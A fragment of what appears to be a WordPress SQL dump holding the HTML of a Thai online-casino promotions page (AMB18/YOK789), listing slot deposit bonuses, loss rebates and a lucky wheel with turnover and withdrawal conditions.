0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Lucky Wheel กงล้อเสี่ยงโชค </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">หมุนลุ้นรางวัลทุกวันด้วยแต้ม <strong data-start=\"75\" data-end=\"85\">Reward</strong> ของคุณ <br />เปลี่ยนแต้มเป็นสิทธิ์หมุน แล้วรับเครดิตโบนัสทันทีหลังจบการหมุน</p><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"197\" data-end=\"252\"><strong data-start=\"197\" data-end=\"250\">20 / 50 / 100 / 150 / 200 / 250 / 300 เครดิตโบนัส</strong></li><li data-start=\"197\" data-end=\"252\"><strong data-start=\"255\" data-end=\"275\">🎁 Mystery Prize</strong> สุ่มรางวัลพิเศษ (เช่น 500 เครดิต <strong data-start=\"310\" data-end=\"318\">หรือ</strong> สปินเพิ่ม +1)</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <h2>วิธีการรับโปรโมชั่น</h2> <ul><li data-start=\"2531\" data-end=\"2570\">เข้าสู่ระบบ → ไปที่เมนู <strong data-start=\"2555\" data-end=\"2568\">โปรโมชั่น</strong></li><li data-start=\"2574\" data-end=\"2643\">เลือกโปรที่ต้องการ และกด <strong data-start=\"2599\" data-end=\"2614\">กดรับสิทธิ์</strong> (หรือแจ้งแอดมินตามที่ระบุ)</li><li data-start=\"2647\" data-end=\"2706\">ระบบเครดิตเข้า <strong data-start=\"2662\" data-end=\"2675\">อัตโนมัติ</strong> / หรือหลังยืนยันสิทธิ์สำเร็จ</li><li data-start=\"2710\" data-end=\"2741\">ตรวจสอบสถานะได้ในประวัติธุรกรรม</li></ul> <h2>เงื่อนไข</h2> <ul><li data-start=\"2092\" data-end=\"2176\">โปรทั้งหมดสำหรับ <strong data-start=\"2109\" data-end=\"2138\">1 ผู้ใช้/1 อุปกรณ์/1 ไอพี</strong> ห้ามใช้หลายบัญชีหรือทุจริตทุกรูปแบบ</li><li data-start=\"2179\" data-end=\"2301\">การนับเทิร์นและการถอน <strong data-start=\"2201\" data-end=\"2237\">เป็นไปตามระบบอัตโนมัติของ <b>YOK789</b></strong> เฉพาะหมวดสล็อต (หากมีหมวดที่ไม่นับเทิร์น ระบบจะแจ้งในหน้าเกม)</li><li data-start=\"2304\" data-end=\"2404\">เมื่อกดรับโปรใดโปรหนึ่ง ถือว่ายอมรับเงื่อนไขของโปรนั้น ๆ และ <strong data-start=\"2365\" data-end=\"2385\">ไม่สามารถซ้อนโปร</strong> ยกเว้นที่ระบุไว้</li><li data-start=\"2407\" data-end=\"2499\"><strong data-start=\"2414\" data-end=\"2445\"><b>YOK789</b> ขอสงวนสิทธิ์ปรับปรุง/ยกเลิก</strong> โปรโมชั่น และปฏิเสธการจ่ายหากตรวจพบทุจริต/ผิดเงื่อนไข</li></ul>','โปรโมชั่น','','inherit','closed','closed','','27-revision-v1','','','2026-02-26 19:24:50','2026-02-26 19:24:50','',27,'https://amb18slot.com/?p=404',0,'revision','',0),(405,3,'2026-02-26 19:24:50','2026-02-26 19:24:50','<h1>โปรโมชั่น AMB18 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น</h1> <p data-pm-slice=\"0 0 []\">โปรโมชั่นตัวตึงจาก AMB18 จัดเต็มเพื่อสายสล็อตตัวจริงกับโปรสมัครใหม่รับโบนัสฟรี 100% เพิ่มพลังให้สนุกได้ตั้งแต่ก้าวแรกเติมไม่ต้องหนักก็มีสิทธิ์ลุ้นมันส์ได้เหมือนกัน แถมเงื่อนไขถอนไม่อั้น เล่นได้แบบไม่ต้องกั๊กรองรับครบทั้งสมาชิกใหม่และสมาชิกปัจจุบันใครอยู่ทีมไหนก็เข้าร่วมได้หมดรวมโปรสล็อตมาให้แบบจุก ๆ ทั้งโบนัสฝากครั้งแรก โบนัสฝากประจำ โปรคืนยอดเสีย และกิจกรรมพิเศษตามเทศกาลที่สลับมาให้ร่วมสนุกตลอดปีอัปเดตใหม่เรื่อย ๆ ไม่มีเอาต์ ช่วยให้ทุกยอดเดิมพันดูคุ้มขึ้นแบบเห็นชัด เรื่องระบบก็หายห่วงเพราะฝากถอนอัตโนมัติทำรายการไวแบบไม่ต้องรอนาน ปลอดภัย มั่นใจได้ รองรับธนาคารชั้นนำ ใช้งานง่ายบนออนไลน์ ตอบโจทย์สายเอ็นเตอร์เทนที่อยากได้ทั้งความตื่นเต้นและความสะดวกในที่เดียว แต่ถึงโปรจะปังแค่ไหนก็อย่าลืมเล่นแบบมีสติวางแผนการเงินทุกครั้งก่อนเริ่มเดิมพัน และเปิดให้บริการสำหรับผู้ที่มีอายุ 18 ปีขึ้นไปเท่านั้น เพื่อให้ความสนุกมาคู่กับความรับผิดชอบและความปลอดภัยแบบจริงจัง</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp\" alt=\"20 get 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 20 รับ 100</h2> <p style=\"text-align: center;\">ฝาก 20 → รับเพิ่ม 80 = รวม 100 / ทำเทิร์น 8 เท่า / ถอนได้สูงสุด 200</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 8 เท่า ของยอดรวม</li><li>เฉพาะสล็อตเท่านั้น</li><li>ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp\" alt=\"79 get 200\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปร 79 รับ 200</h2> <p style=\"text-align: center;\">ฝาก 79 → รับเพิ่ม 121 = รวม 200 / ทำเทิร์น 7 เท่า / ถอนได้สูงสุด 600</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"996\" data-end=\"1012\">การทำเทิร์น</strong> 7 เท่า ของยอดรวม</li><li data-start=\"798\" data-end=\"837\">เฉพาะสล็อตเท่านั้น</li><li data-start=\"798\" data-end=\"837\">ห้ามซื้อฟรีสปิน</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp\" alt=\"Bonus free 100\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>โปรรับโมบัส 100%</h2> <p style=\"text-align: center;\" data-start=\"696\" data-end=\"740\"><strong data-start=\"696\" data-end=\"711\">คุ้มสองเด้ง</strong> เติมเท่าไรรับเพิ่มเท่านั้น</p><ul><li data-start=\"696\" data-end=\"740\"><strong data-start=\"743\" data-end=\"758\">100 รับ 200</strong></li><li data-start=\"696\" data-end=\"740\"><strong data-start=\"763\" data-end=\"780\">500 รับ 1,000</strong></li></ul><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"798\" data-end=\"837\"><strong data-start=\"798\" data-end=\"813\">ทำ 6 เทิร์น</strong>, <strong data-start=\"815\" data-end=\"835\">ถอนสูงสุด 3 เท่า</strong></li><li data-start=\"798\" data-end=\"837\">ก่อนถอน <strong data-start=\"848\" data-end=\"886\">ระบบตัดเครดิตโปรโมชั่น (ส่วนโบนัส)</strong> ออกโดยอัตโนมัติ เหลือยอดเงินจริงสำหรับถอน</li><li data-start=\"798\" data-end=\"837\">จำกัดสิทธิ์ <strong data-start=\"945\" data-end=\"967\">1 ครั้ง/วัน/ผู้ใช้</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp\" alt=\"HBD Bonus\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>Happy Birthday Bonus </h2> <p style=\"text-align: center;\" data-start=\"1415\" data-end=\"1466\">🎁 ฉลองเดือนเกิด รับของขวัญตามยอดฝากสะสมภายในเดือนนั้น <br />(รับได้ตลอดทั้งเดือนเกิด)</p><ul><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1480\" data-end=\"1496\">3,000 ขึ้นไป</strong> → <strong data-start=\"1499\" data-end=\"1513\">รับฟรี 300</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1529\" data-end=\"1542\">500–2,999</strong> → <strong data-start=\"1545\" data-end=\"1555\">รับ 50</strong></li><li data-start=\"1469\" data-end=\"1515\">ยอดฝากสะสม <strong data-start=\"1571\" data-end=\"1586\">ไม่เกิน 500</strong> → <strong data-start=\"1589\" data-end=\"1616\">ฝากเท่าไร รับเพิ่ม 100%</strong></li></ul><p data-start=\"271\" data-end=\"387\"><strong data-start=\"371\" data-end=\"387\">สรุปเงื่อนไข</strong></p><ul><li data-start=\"1634\" data-end=\"1680\"><strong data-start=\"1634\" data-end=\"1653\">ทำเทิร์น 5 เท่า</strong>, <strong data-start=\"1655\" data-end=\"1678\">ถอนได้สูงสุด 3 เท่า</strong></li><li data-start=\"1634\" data-end=\"1680\">ยืนยันสิทธิ์โดย <strong data-start=\"1699\" data-end=\"1727\">แจ้งบัตรประชาชนกับแอดมิน</strong></li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp\" alt=\"Reward 10\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>คืนยอดเสีย 10%</h2> <p style=\"text-align: center;\" data-start=\"1088\" data-end=\"1118\">เสียไม่เสียเปล่า! ระบบ <strong data-start=\"1844\" data-end=\"1878\">แปลงยอดเสียเป็นแต้ม Reward 10%</strong> <br />นำแต้มไปลุ้นใหมหรือจะแลกของรางวัลก็ได้ ในหน้าแลกแต้ม</p><p><strong>สรุปเงื่อนไข</strong></p><ul><li data-start=\"1936\" data-end=\"1990\">คิดเป็นเปอร์เซ็นต์จากยอดเสียสุทธิ ตามรอบที่ระบบกำหนด</li><li data-start=\"1936\" data-end=\"1990\">แต้มไม่ใช่เงินสดโดยตรง ต้องนำไปแลกตามรายการที่เปิดให้แลกในขณะนั้น</li></ul> <a href=\"http://luca333line.com\" target=\"_blank\">\n <svg aria-hidden=\"true\" viewBox=\"0 0 512 512\" xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\"></path></svg> \n รับโปรโมชั่น คลิกเลย\n </a>\n <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp\" alt=\"lucky wheel\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789-300x125.webp 300w, 